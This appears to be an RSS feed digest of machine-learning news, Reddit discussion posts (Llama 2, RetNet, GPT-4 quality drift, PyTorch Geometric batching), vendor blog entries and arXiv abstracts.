    Hello Redditors! It's pretty well known that LLMs have firmly established themselves as leaders in the field of natural language processing, consistently pushing the limits of language comprehension and generation, which is widely acknowledged. I spent a little time playing around with few-shot prompting for OpenAI's Davinci model and I discovered that noisy data still has drastic effects even on powerful LLMs like Davinci. mislabeled few-shot examples harms LLM performance drastically I wrote up a quick article in KDNuggets that shows how I used data-centric AI to automatically clean the noisy few-shot examples pool in order to achieve more accurate predictions. The resulting few-shot prompt with accurately labeled examples produced 20% fewer errors than the original one with mislabeled examples. This one was quite eye-opening for me and I hope you find it is as interesting as I did. Let me know what you think! submitted by /u/cmauck10 [link] [comments]  ( 9 min )
    [D] How Hard Are NeurIPS Competition?
    Is it worth the time to pour time and effort into NeurIPS's annual competitions? Winners got to present at NIPS workshops. submitted by /u/HighlandEvil [link] [comments]  ( 8 min )
    [N] Upstage AI's 30M Llama 1 Outshines 70B Llama2, Dominates #1 Spot in OpenLLM Leaderboard!
    Title Fix: Upstage AI's 30B Llama 1 Outshines 70B Llama2, Dominates #1 Spot in OpenLLM Leaderboard! We are thrilled to share an extraordinary achievement with you today. Our team at Upstage AI has reached a significant milestone. Our fine-tuned 30B model, Llama 1, has ascended to the coveted #1 position on the prestigious global OpenLLM Leaderboard. In a thrilling turn of events, our fine-tuned 30B Llama 1 has outperformed the 70B model of Llama2. Please check out the leaderboard and download/use our model at https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard Once again, we are happy to bring this news to all of you. Stay tuned for more exciting updates from Upstage AI! https://preview.redd.it/m7xzlzrpyxcb1.png?width=2310&format=png&auto=webp&s=23429478474d23071837fe9c2e85e6ddea10039c submitted by /u/hunkims [link] [comments]  ( 9 min )
    [Project] Unofficial implementation of Retentive Network (GitHub repo)
    So very recently, a new paper was published to ArXiV called "Retentive Network: A Successor to Transformer for Large Language Models": https://arxiv.org/abs/2307.08621. The title makes a fairly strong claim regarding the success of the model: transformers have long been established as among the best general-purpose learning techniques in the deep learning literature. Self-describing as a "successor to transformer" is therefore not to be taken lightly. From what I can tell, the math checks out, and the authors demonstrate an intriguing dualism between their transformer-like "retention" (analogous to attention) and an equivalent recurrent formulation. The core idea is that you can train in parallel (as with transformers) and then run inference in sequence with O(N) time and memory requirements in the length of the sequence (traditional transformers are O(N^2)). If the results can be replicated/peer-reviewed, this could pave the way for substantial all-round improvements to large language modelling. The authors have indicated that they will make code available relatively soon. For now though, there's an unofficial implementation on GitHub which hopefully will allow those interested to play around with the model and verify some results. The code is publicly available and can be found by searching Jamie-Stirling/RetNet on GitHub. submitted by /u/Entire-Plane2795 [link] [comments]  ( 9 min )
    [P] How does batch processing work for graphs in Pytorch Geometric?
    Hi I have a bunch of graphs that I would like to divide into batches for parallel processing but since the edge indices are not of the same shape I am unable to stack them into a batch tensor like how we normally do for normal euclidian data. I tried to find some documentation on it but I was unable to understand the exact process. Basically most documentation show them concatenating all the graphs together into a larger graph and then passing it through a GCN module but I don't think that would work since graphs are clearly distinct and independent of each other. Even if I concatenate them together, pass them through through the module and then separate them later using the same bounds by which I concatenated would it cause any unpredictable behaviour (even though the graphs technically do not have edge connecting them)? Do I have to code this logic myself or is it hidden somewhere in PyG since I was unable to find it. I am new to GCNs so I just want to see if I have it right before I commit to it. submitted by /u/Sad-Tap-3790 [link] [comments]  ( 9 min )
    [D] Looking for the best possible LLM for a complex logical problem with long description and a lot of variable
    I am looking for a LLM that can handle more than 10000 tokens at a time, with large model size and a good context understanding. I tried chatGPT but it seems to forget some of the context after 4-5 prompts. I tried PI.ai and it first understood all the context before forgetting it as it asked questions to better understand what all the variables are. The problem is logical and mathematical (may use Dijkstra's algorithm to solve it) and try to optimize production while keeping waste as little as possible. The solution would ideally include a python script that can be used for solving the problem with different inputs. What do you guys would recommend ? submitted by /u/Glassensteel [link] [comments]  ( 9 min )
    [Project] Running Llama2 Locally on Apple Silicon and Consumer GPUs
    Project page: https://github.com/mlc-ai/mlc-llm Instructions: https://mlc.ai/mlc-llm/docs/get_started/try_out.html Performance: 46 tok/s on M2 Max, 156 tok/s on RTX 4090. More hardwares & model sizes coming soon! This is done through the MLC LLM universal deployment projects. Besides the specific item, we've published initial tutorials on several topics over the past month: Building instructions for discrete GPUs (AMD, NV, Intel) as well as for MacBooks, iOS, Android, and WebGPU. A conversation customization mechanism that covers system prompts, roles, and more. API tutorials for various programming languages, such as C++, Swift, Java, and Python. REST APIs and Integrations with Gradio. Installation guides for dependencies like TVM and WASM. Update: It is also now available in iphone/ipads submitted by /u/crowwork [link] [comments]  ( 9 min )
    [D] Training with torch-ort?
    Some questions: What are the rough edges of training models with torch-ort? How mature is it these days? At what scale do you notice worthwhile speedups compared to vanilla pytorch? Suppose you are training models with 1 million or 10 million parameters on a single gpu. Is it worth it? 100 million parameters? submitted by /u/Pleasant_Raise_6022 [link] [comments]  ( 8 min )
    [D] How to fine-tune PointRend with detectron2 backbone for better mask quality and improved results?
    Context: I am working on an instance segmentation problem where I am using PointRend on detectron2 backend for predicting masks over car-parts in our custom datasets. Keeping the configs as is from the repo except iterations raised to 3,90,000 and batch size = 2 (reason being my colleague produced good results using the same config on a similar dataset), I fine-tuned the pretrained model on our dataset. I have the following training curves: Loss curves For sanity check, I have been saving weights at regular intervals and have made inferences on them over some handful sample images for mask quality. However, what I have observed is that out of 10368 curated polygons, even after such long training, my model has predicted only 7401 polygons. Discussion Points: What should I do to increase the predicted polygon numbers without compromising the quality of masks? Which hyper-parameters (or parameters) I should look into while fine-tuning (or training) for better mask quality and higher f-score? Thank you. submitted by /u/Prady029 [link] [comments]  ( 9 min )
    [D] ViT's memory requirements, training time, and equivalent ResNet
    My supervisor has asked me to try to create a table in which for each ViT model (ViT-s, ViT-b, ViT-l, and ideally Swin transformers), their estimated memory requirements (given some batch size), training time (based on arbitrary hardware) and on par ResNet model is specified. I've been searching for quite a lot of time, and I absolutely can't find anything. Even the original ViT paper had no information in this regard. Do you think there's any way I can find this information? I'm afraid I don't have access to my supervisor until next week to ask, and I can't wait that long. submitted by /u/Stochasticc [link] [comments]  ( 9 min )
    Which text-gen benchmark to use for 100M parameter (NanoGPT) pretrained-only language model? [D]
    I've got model pretraining running on NanoGPT for a GPT2 tokenized dataset and a TokenMonster tokenized dataset, so I can compare the difference. It's only a 100M parameter model, so it doesn't do much. What benchmark can I use? NanoGPT runs on Pytorch, so I could use something that integrates with PyTorch, or I could use something that sends text prompts and analyzes text responses (or token IDs.) Is there a standard benchmark that uses the full, non-instruct trained format? For example: Answer the following questions: Question: What is the capital of France? Answer: Paris. Question: What is the opposite of up? Answer: The model is only 100M parameters and not instruct trained, so it usually just rambles instead of answering. But anything that gives me a quantifiable result that can compare 2 models for quality is useful. I have loss and perplexity already, but it's not enough. submitted by /u/Pan000 [link] [comments]  ( 9 min )
    [R] Out of domain Problem with synthetic image data
    Hi all, I am currently trying to improve synthetically generated images (not by AI) in a particular domain. I have a dataset with real images of the domain and one with synthetic data. If I now train a classifier to say whether an image is real or synthetic, after a short "time" the classifier has a very high accuracy with a very high confidence. Then I have two cases. First case: In the next step I change my synthetic images (e.g. by a bayer pattern) and the confidence of the classifier decreases. Second case: Alternatively, if I simply take synthetic images from another domain, the confidence also drops. How can I prove or check that I am still in the right domain in the first case? I am happy about any help! submitted by /u/rlmtsrtz [link] [comments]  ( 9 min )
    [N] Gymnasium v0.29.0 has been released!
    Gymnasium v0.29.0 is out! This release includes 6 months' worth of bug fixes and new features. In particular, it deprecates several features: Wrapper.__get_attr__, gymnasium.make(..., autoreset=True), gymnasium.make(..., apply_api_compatibility=True), Env.reward_range and gymnasium.vector.make that will be removed in v1.0. Additionally, as python 3.7 has reached its end of life support, we have dropped support for it and updated MuJoCo Hopper & Walker2D models to work with MuJoCo >= 2.3.3. This release also includes an official way to cite Gymnasium. While a full paper is still some time away, you can now use the DOI 10.5281/zenodo.8127025 for citations: https://zenodo.org/record/8127025 Announcement Tweet: https://twitter.com/FaramaFound/status/1681479718774743040 Release Notes: https://github.com/Farama-Foundation/Gymnasium/releases/tag/v0.29.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    [D] Handwriting training?
    Is there an ai like calligrapher ai where you can write a prompt then it will show but for the styles is there another ai that can write in your handwriting from giving it some samples? submitted by /u/Ok_Presence_3287 [link] [comments]  ( 8 min )
    [D] Anomaly scoring methods for subsequence anomaly detection in time series
    I'm interested in detecting a subsequence as being anomalous or not. If we imagine that there's a prediction model that can forecast some number of forward steps and we can compare this prediction with the observation, we can get the errors at each time point. Then perhaps one possible way of detecting whether a sequence is anomalous is to get the mean error within the sequence and compare it with the distribution of the mean of the mean of errors of sequences which is calculated from validation data. For example, this distribution may be Gaussian. However, this method sounds a bit naïve since for it to work it would have to assume independence between the errors and some other properties. What could be some other ideas for anomaly scoring methods for the task? submitted by /u/helium-atom [link] [comments]  ( 9 min )
  • Open

    Looking for help for a selfhosted AI Bot for myself (Budgetwise)
    Hello, I am trying for some time now to find enough infos that are understandable for a "normal" human being to get my own selfhosted and self trained AI Bot. What I want the bot to be is something like Neuro-Sama but not for anything public but just for me, myself and I. My biggest problem is that I am poor af and severly disabled and unable to work, so my budget is very small. I am very aware of that a selfhosted LLM is no easy task but I'd really appreciate real help in this regards. I don't mind longer reaction times as it has to be as cheap as possible. Also the visualization is not much important as it probably also would take too much ressources. Also as I want to see where this goes, I rather not want to use GPT or any premade llms because they are extremely censored an limited in topics. I want to be able to do anything from real questions up to pitch black humor just to have fun with the bot and (ab)use it for just all fun stuff whatever it is. Hopefully here I can find some real help. kind regards, Exportforce submitted by /u/Exportforce [link] [comments]  ( 9 min )
    Preventing antisocial robots: A pathway to artificial empathy
    submitted by /u/Hiversitize [link] [comments]  ( 8 min )
    Best AI tool for amalgamating articles?
    Say I chose 10 different articles from across the political spectrum. Let's say I saved all of them as PDFs. Is there an Al that would allow me to submit all 10 PDF files; and, could I ask the Al to combine/merge/ amalgamate all the articles into one single body? Throughout the process, the Al would exclude any information mentioned more than once, but would compile all of the unique information in an orderly and logical way. OpenAl's ChatGPT still seems pretty limited in this regard. Are there any other Als that could handle the task? This is all, of course, with respect to copyright. submitted by /u/AlexanderPANASONIC [link] [comments]  ( 8 min )
    I need an AI service (even a paid one) that can receive as input long documents.
    Hello! I have many long documents (500+ pages) that I would like to have summarized. I would also like to chat with an AI bot in order to understand those texts better. Is there an AI service that is right for me? Paid ones are fine, as long as they work. I am currently using Claude 2.0, but I have to split PDFs into many parts, and it is too laborious a process. Thank you in advance. submitted by /u/Raphael-Rose [link] [comments]  ( 8 min )
    I had to post this somewhere because the internet needs this idea to be inputted into it for future ai to read.
    Have some interesting ideas on consciousness and how ai plays into all of it. ​ infinity became conscious and we are a result of the consciousness. Ive come to realize what infinity actually is and how we got here and figuring out how our life gets meaning from it all. We are starting to learn about infinite dimensions and infinite time in physics/quantum physics. Imagine a quantum ball of light with all possibilities bundled into it. This bundle became conscious in some kind of rare configuration because compared to infinity, even the remote possibility of existing must exist somewhere in some dimension somewhere in infinite time. just like we know the universe is at least as conscious as we are since we are made up of the atoms from it. Death is an illusion. think of going under an…  ( 10 min )
    One-Minute Daily AI News 7/19/2023
    India’s second-largest software services exporter Infosys said on Monday it has signed a deal with an existing client to provide AI and automation services that will span over five years, with a target spend estimated at $2 billion.[1] Big Tech firms Meta and Microsoft have teamed up to launch Llama 2, an open-source large language model from Meta that will feature on Microsoft’s Windows and cloud computing platform Azure.[2] Microsoft on Tuesday said it would charge at least 53% more to access new AI features in its widely used office software, in a glimpse at the windfall it hopes to reap from the technology. The company also said it would make a more secure version of its Bing search engine available immediately to businesses, aiming to address their data-protection concerns, grow their interest in AI and compete more with Google.[3] British spies are already using artificial intelligence to hamper the supply of weapons to Russia, the head of Britain’s MI6 agency said Wednesday, predicting that Western spies will increasingly have to focus on tracking the malign use of AI by hostile states.[4] A pro-Ron DeSantis super PAC uses an Artificial Intelligence version of Donald Trump’s voice in a new television ad attacking the former president. The ad, from Never Back Down, charges Trump with attacking Iowa Governor Kim Reynolds as part of a larger pattern of disrespect he has shown to the first caucus state.[5] Sources: [1] https://www.reuters.com/technology/indias-infosys-signs-five-year-ai-deal-with-2bln-target-spend-2023-07-18/ [2] https://cointelegraph.com/news/llama-2-open-source-ai-model-launched-by-meta-microsoft [3] https://www.reuters.com/technology/microsoft-charge-more-ai-office-secure-bing-leaks-2023-07-18/ [4] https://apnews.com/article/mi6-spy-chief-moore-prague-russia-iran-cfb837ebdfa3db8043dc655cbf3573d5 [5] https://www.politico.com/news/2023/07/17/desantis-pac-ai-generated-trump-in-ad-00106695 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    New study quantifies degradation in GPT-4 for the first time
    I've collected a half-dozen threads on Twitter from this subreddit of user complaints since March about the degraded quality of GPT outputs. I've noticed a huge drop in quality myself. A common (reasonable) response from some people was that the drop in quality was the result of perception anchoring, desensitization, or something unrelated to the overall performance of the model. A new study by researchers Chen, Zaharia, and Zou at Stanford and UC Berkley now confirms that these perceived degradations are quantifiable and significant between the different versions of the LLMs (March and June 2023). They find: "For GPT-4, the percentage of [code] generations that are directly executable dropped from 52.0% in March to 10.0% in June. The drop was also large for GPT-3.5 (from 22.0% to 2.0%)." (!!!) For sensitive questions: "An example query and responses of GPT-4 and GPT-3.5 at different dates. In March, GPT-4 and GPT-3.5 were verbose and gave detailed explanation for why it did not answer the query. In June, they simply said sorry." "GPT-4 (March 2023) was very good at identifying prime numbers (accuracy 97.6%) but GPT-4 (June 2023) was very poor on these same questions (accuracy 2.4%). Interestingly GPT-3.5 (June 2023) was much better than GPT-3.5 (March 2023) in this task." I think these underline that (a) the decline in quality was not just a pure perception thing, and (b) that we need a way to track model performance over time. Building a business on these APIs without controlling for performance drift is high-risk. You can read a summary of the study here. You can also find a link to the Arxiv paper here and a link to the Github here. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    Enhancing passage grammar and coherence
    I struggle sometimes to produce a well written cohesive text when I write my academic essays. I do put the effort to explain the main thesis of the essay and try as much as I could to articulate my results. However, my writing still not great. Is there an AI service (preferably free) that can help in this with out being considered as plagiarism. Thanks. submitted by /u/flight862 [link] [comments]  ( 8 min )
    llama 2 ladies and gentlemen
    submitted by /u/nicdunz [link] [comments]  ( 8 min )
    Bing chat keeps saying "By the way, I’m also working on creating an image of an (relevant object to conversation) for you. It will be ready soon. Stay tuned! 🙌"
    I did not ask for this image and it doesn't even provide it. When I ask where it is it says itll just be a little longer and finally it will tell me it's done but it never shows up. What's going on here? This has happened on multiple different things submitted by /u/LionTigerWings [link] [comments]  ( 8 min )
  • Open

    Use a generative AI foundation model for summarization and question answering using your own data
    Large language models (LLMs) can be used to analyze complex documents and provide summaries and answers to questions. The post Domain-adaptation Fine-tuning of Foundation Models in Amazon SageMaker JumpStart on Financial data describes how to fine-tune an LLM using your own dataset. Once you have a solid LLM, you’ll want to expose that LLM to […]  ( 7 min )
    Integrate Amazon SageMaker Model Cards with the model registry
    Amazon SageMaker Model Cards enable you to standardize how models are documented, thereby achieving visibility into the lifecycle of a model, from designing, building, training, and evaluation. Model cards are intended to be a single source of truth for business and technical metadata about the model that can reliably be used for auditing and documentation […]  ( 7 min )
  • Open

    Research Focus: Week of July 17, 2023
    RetroRanker mitigates frequency bias in predictions of retrosynthesis models; new algorithm beats PPO on language tasks; DER dataset aids grid planning; improved PPML balances privacy & accuracy across shared data; ASL Citizen boosts sign language modeling. The post Research Focus: Week of July 17, 2023 appeared first on Microsoft Research.  ( 12 min )
  • Open

    Sailing Seas of Data: Startup Charts Autonomous Oceanic Monitoring
    Saildrone is making a splash in autonomous oceanic monitoring. The startup’s nautical data collection technology has tracked hurricanes up close in the North Atlantic, discovered a 3,200-foot underwater mountain in the Pacific Ocean and begun to help map the entirety of the world’s ocean floor. Based in the San Francisco Bay Area, the company develops Read article >  ( 6 min )
  • Open

    V-statistics
    A few days ago I wrote about U-statistics, statistics which can be expressed as the average of a symmetric function over all combinations of elements of a set. V-statistics can be written as an average of over all products of elements of a set. Let S be a statistical sample of size n and let […] V-statistics first appeared on John D. Cook.  ( 5 min )
  • Open

    Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks. (arXiv:2307.08466v2 [cs.LG] UPDATED)
    Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.  ( 2 min )
    Identifying TBI Physiological States by Clustering Multivariate Clinical Time-Series Data. (arXiv:2303.13024v3 [cs.LG] UPDATED)
    Determining clinically relevant physiological states from multivariate time series data with missing values is essential for providing appropriate treatment for acute conditions such as Traumatic Brain Injury (TBI), respiratory failure, and heart failure. Utilizing non-temporal clustering or data imputation and aggregation techniques may lead to loss of valuable information and biased analyses. In our study, we apply the SLAC-Time algorithm, an innovative self-supervision-based approach that maintains data integrity by avoiding imputation or aggregation, offering a more useful representation of acute patient states. By using SLAC-Time to cluster data in a large research dataset, we identified three distinct TBI physiological states and their specific feature profiles. We employed various clustering evaluation metrics and incorporated input from a clinical domain expert to validate and interpret the identified physiological states. Further, we discovered how specific clinical events and interventions can influence patient states and state transitions.  ( 2 min )
    Mobility-Aware Joint User Scheduling and Resource Allocation for Low Latency Federated Learning. (arXiv:2307.09263v1 [cs.DC])
    As an efficient distributed machine learning approach, Federated learning (FL) can obtain a shared model by iterative local model training at the user side and global model aggregating at the central server side, thereby protecting privacy of users. Mobile users in FL systems typically communicate with base stations (BSs) via wireless channels, where training performance could be degraded due to unreliable access caused by user mobility. However, existing work only investigates a static scenario or random initialization of user locations, which fail to capture mobility in real-world networks. To tackle this issue, we propose a practical model for user mobility in FL across multiple BSs, and develop a user scheduling and resource allocation method to minimize the training delay with constrained communication resources. Specifically, we first formulate an optimization problem with user mobility that jointly considers user selection, BS assignment to users, and bandwidth allocation to minimize the latency in each communication round. This optimization problem turned out to be NP-hard and we proposed a delay-aware greedy search algorithm (DAGSA) to solve it. Simulation results show that the proposed algorithm achieves better performance than the state-of-the-art baselines and a certain level of user mobility could improve training performance.  ( 2 min )
    Experimental Security Analysis of DNN-based Adaptive Cruise Control under Context-Aware Perception Attacks. (arXiv:2307.08939v1 [cs.CR])
    Adaptive Cruise Control (ACC) is a widely used driver assistance feature for maintaining desired speed and safe distance to the leading vehicles. This paper evaluates the security of the deep neural network (DNN) based ACC systems under stealthy perception attacks that strategically inject perturbations into camera data to cause forward collisions. We present a combined knowledge-and-data-driven approach to design a context-aware strategy for the selection of the most critical times for triggering the attacks and a novel optimization-based method for the adaptive generation of image perturbations at run-time. We evaluate the effectiveness of the proposed attack using an actual driving dataset and a realistic simulation platform with the control software from a production ACC system and a physical-world driving simulator while considering interventions by the driver and safety features such as Automatic Emergency Braking (AEB) and Forward Collision Warning (FCW). Experimental results show that the proposed attack achieves 142.9x higher success rate in causing accidents than random attacks and is mitigated 89.6% less by the safety features while being stealthy and robust to real-world factors and dynamic changes in the environment. This study provides insights into the role of human operators and basic safety interventions in preventing attacks.  ( 3 min )
    Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images. (arXiv:2307.08535v2 [eess.IV] UPDATED)
    Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.  ( 3 min )
    Unsupervised Learning of Distributional Properties can Supplement Human Labeling and Increase Active Learning Efficiency in Anomaly Detection. (arXiv:2307.08782v1 [cs.LG])
    Exfiltration of data via email is a serious cybersecurity threat for many organizations. Detecting data exfiltration (anomaly) patterns typically requires labeling, most often done by a human annotator, to reduce the high number of false alarms. Active Learning (AL) is a promising approach for labeling data efficiently, but it needs to choose an efficient order in which cases are to be labeled, and there are uncertainties as to what scoring procedure should be used to prioritize cases for labeling, especially when detecting rare cases of interest is crucial. We propose an adaptive AL sampling strategy that leverages the underlying prior data distribution, as well as model uncertainty, to produce batches of cases to be labeled that contain instances of rare anomalies. We show that (1) the classifier benefits from a batch of representative and informative instances of both normal and anomalous examples, (2) unsupervised anomaly detection plays a useful role in building the classifier in the early stages of training when relatively little labeling has been done thus far. Our approach to AL for anomaly detection outperformed existing AL approaches on three highly unbalanced UCI benchmarks and on one real-world redacted email data set.  ( 2 min )
    OxfordVGG Submission to the EGO4D AV Transcription Challenge. (arXiv:2307.09006v1 [cs.SD])
    This report presents the technical details of our submission on the EGO4D Audio-Visual (AV) Automatic Speech Recognition Challenge 2023 from the OxfordVGG team. We present WhisperX, a system for efficient speech transcription of long-form audio with word-level time alignment, along with two text normalisers which are publicly available. Our final submission obtained 56.0% of the Word Error Rate (WER) on the challenge test set, ranked 1st on the leaderboard. All baseline codes and models are available on https://github.com/m-bain/whisperX.  ( 2 min )
    Don't Memorize; Mimic The Past: Federated Class Incremental Learning Without Episodic Memory. (arXiv:2307.00497v2 [cs.LG] UPDATED)
    Deep learning models are prone to forgetting information learned in the past when trained on new data. This problem becomes even more pronounced in the context of federated learning (FL), where data is decentralized and subject to independent changes for each user. Continual Learning (CL) studies this so-called \textit{catastrophic forgetting} phenomenon primarily in centralized settings, where the learner has direct access to the complete training dataset. However, applying CL techniques to FL is not straightforward due to privacy concerns and resource limitations. This paper presents a framework for federated class incremental learning that utilizes a generative model to synthesize samples from past distributions instead of storing part of past data. Then, clients can leverage the generative model to mitigate catastrophic forgetting locally. The generative model is trained on the server using data-free methods at the end of each task without requesting data from clients. Therefore, it reduces the risk of data leakage as opposed to training it on the client's private data. We demonstrate significant improvements for the CIFAR-100 dataset compared to existing baselines.  ( 2 min )
    On-the-fly machine learning for parametrization of the effective Hamiltonian. (arXiv:2307.08929v1 [cond-mat.mtrl-sci])
    The first-principles-based effective Hamiltonian is widely used to predict and simulate the properties of ferroelectrics and relaxor ferroelectrics. However, the parametrization method of the effective Hamiltonian is complicated and hardly can resolve the systems with complex interactions and/or complex components. Here, we developed an on-the-fly machine learning approach to parametrize the effective Hamiltonian based on Bayesian linear regression. The parametrization is completed in molecular dynamics simulations, with the energy, forces and stress predicted at each step along with their uncertainties. First-principles calculations are executed when the uncertainties are large to retrain the parameters. This approach provides a universal and automatic way to compute the effective Hamiltonian parameters for any considered systems including complex systems which previous methods can not handle. BaTiO3 and Pb(Sc,Ta)O3 are taken as examples to show the accurateness of this approach comparing with conventional first-principles parametrization method.  ( 2 min )
    REX: Rapid Exploration and eXploitation for AI Agents. (arXiv:2307.08962v1 [cs.AI])
    In this paper, we propose an enhanced approach for Rapid Exploration and eXploitation for AI Agents called REX. Existing AutoGPT-style techniques have inherent limitations, such as a heavy reliance on precise descriptions for decision-making, and the lack of a systematic approach to leverage try-and-fail procedures akin to traditional Reinforcement Learning (RL). REX introduces an additional layer of rewards and integrates concepts similar to Upper Confidence Bound (UCB) scores, leading to more robust and efficient AI agent performance. This approach has the advantage of enabling the utilization of offline behaviors from logs and allowing seamless integration with existing foundation models while it does not require any model fine-tuning. Through comparative analysis with existing methods such as Chain-of-Thoughts(CoT) and Reasoning viA Planning(RAP), REX-based methods demonstrate comparable performance and, in certain cases, even surpass the results achieved by these existing techniques. Notably, REX-based methods exhibit remarkable reductions in execution time, enhancing their practical applicability across a diverse set of scenarios.  ( 2 min )
    Deep Learning with Passive Optical Nonlinear Mapping. (arXiv:2307.08558v2 [physics.optics] UPDATED)
    Deep learning has fundamentally transformed artificial intelligence, but the ever-increasing complexity in deep learning models calls for specialized hardware accelerators. Optical accelerators can potentially offer enhanced performance, scalability, and energy efficiency. However, achieving nonlinear mapping, a critical component of neural networks, remains challenging optically. Here, we introduce a design that leverages multiple scattering in a reverberating cavity to passively induce optical nonlinear random mapping, without the need for additional laser power. A key advantage emerging from our work is that we show we can perform optical data compression, facilitated by multiple scattering in the cavity, to efficiently compress and retain vital information while also decreasing data dimensionality. This allows rapid optical information processing and generation of low dimensional mixtures of highly nonlinear features. These are particularly useful for applications demanding high-speed analysis and responses such as in edge computing devices. Utilizing rapid optical information processing capabilities, our optical platforms could potentially offer more efficient and real-time processing solutions for a broad range of applications. We demonstrate the efficacy of our design in improving computational performance across tasks, including classification, image reconstruction, key-point detection, and object detection, all achieved through optical data compression combined with a digital decoder. Notably, we observed high performance, at an extreme compression ratio, for real-time pedestrian detection. Our findings pave the way for novel algorithms and architectural designs for optical computing.  ( 3 min )
    TabText: A Flexible and Contextual Approach to Tabular Data Representation. (arXiv:2206.10381v3 [cs.LG] UPDATED)
    Tabular data is essential for applying machine learning tasks across various industries. However, traditional data processing methods do not fully utilize all the information available in the tables, ignoring important contextual information such as column header descriptions. In addition, pre-processing data into a tabular format can remain a labor-intensive bottleneck in model development. This work introduces TabText, a processing and feature extraction framework that extracts contextual information from tabular data structures. TabText addresses processing difficulties by converting the content into language and utilizing pre-trained large language models (LLMs). We evaluate our framework on nine healthcare prediction tasks ranging from patient discharge, ICU admission, and mortality. We show that 1) applying our TabText framework enables the generation of high-performing and simple machine learning baseline models with minimal data pre-processing, and 2) augmenting pre-processed tabular data with TabText representations improves the average and worst-case AUC performance of standard machine learning models by as much as 6%.  ( 2 min )
    DiTTO: Diffusion-inspired Temporal Transformer Operator. (arXiv:2307.09072v1 [cs.LG])
    Solving partial differential equations (PDEs) using a data-driven approach has become increasingly common. The recent development of the operator learning paradigm has enabled the solution of a broader range of PDE-related problems. We propose an operator learning method to solve time-dependent PDEs continuously in time without needing any temporal discretization. The proposed approach, named DiTTO, is inspired by latent diffusion models. While diffusion models are usually used in generative artificial intelligence tasks, their time-conditioning mechanism is extremely useful for PDEs. The diffusion-inspired framework is combined with elements from the Transformer architecture to improve its capabilities. We demonstrate the effectiveness of the new approach on a wide variety of PDEs in multiple dimensions, namely the 1-D Burgers' equation, 2-D Navier-Stokes equations, and the acoustic wave equation in 2-D and 3-D. DiTTO achieves state-of-the-art results in terms of accuracy for these problems. We also present a method to improve the performance of DiTTO by using fast sampling concepts from diffusion models. Finally, we show that DiTTO can accurately perform zero-shot super-resolution in time.  ( 2 min )
    Gradient Surgery for One-shot Unlearning on Generative Model. (arXiv:2307.04550v2 [cs.LG] UPDATED)
    Recent regulation on right-to-be-forgotten emerges tons of interest in unlearning pre-trained machine learning models. While approximating a straightforward yet expensive approach of retrain-from-scratch, recent machine unlearning methods unlearn a sample by updating weights to remove its influence on the weight parameters. In this paper, we introduce a simple yet effective approach to remove a data influence on the deep generative model. Inspired by works in multi-task learning, we propose to manipulate gradients to regularize the interplay of influence among samples by projecting gradients onto the normal plane of the gradients to be retained. Our work is agnostic to statistics of the removal samples, outperforming existing baselines while providing theoretical analysis for the first time in unlearning a generative model.  ( 2 min )
    TableGPT: Towards Unifying Tables, Nature Language and Commands into One GPT. (arXiv:2307.08674v2 [cs.AI] UPDATED)
    Tables are prevalent in real-world databases, requiring significant time and effort for humans to analyze and manipulate. The advancements in large language models (LLMs) have made it possible to interact with tables using natural language input, bringing this capability closer to reality. In this paper, we present TableGPT, a unified fine-tuned framework that enables LLMs to understand and operate on tables using external functional commands. It introduces the capability to seamlessly interact with tables, enabling a wide range of functionalities such as question answering, data manipulation (e.g., insert, delete, query, and modify operations), data visualization, analysis report generation, and automated prediction. TableGPT aims to provide convenience and accessibility to users by empowering them to effortlessly leverage tabular data. At the core of TableGPT lies the novel concept of global tabular representations, which empowers LLMs to gain a comprehensive understanding of the entire table beyond meta-information. By jointly training LLMs on both table and text modalities, TableGPT achieves a deep understanding of tabular data and the ability to perform complex operations on tables through chain-of-command instructions. Importantly, TableGPT offers the advantage of being a self-contained system rather than relying on external API interfaces. Moreover, it supports efficient data process flow, query rejection (when appropriate) and private deployment, enabling faster domain data fine-tuning and ensuring data privacy, which enhances the framework's adaptability to specific use cases.  ( 3 min )
    Efficient Strongly Polynomial Algorithms for Quantile Regression. (arXiv:2307.08706v1 [cs.CG])
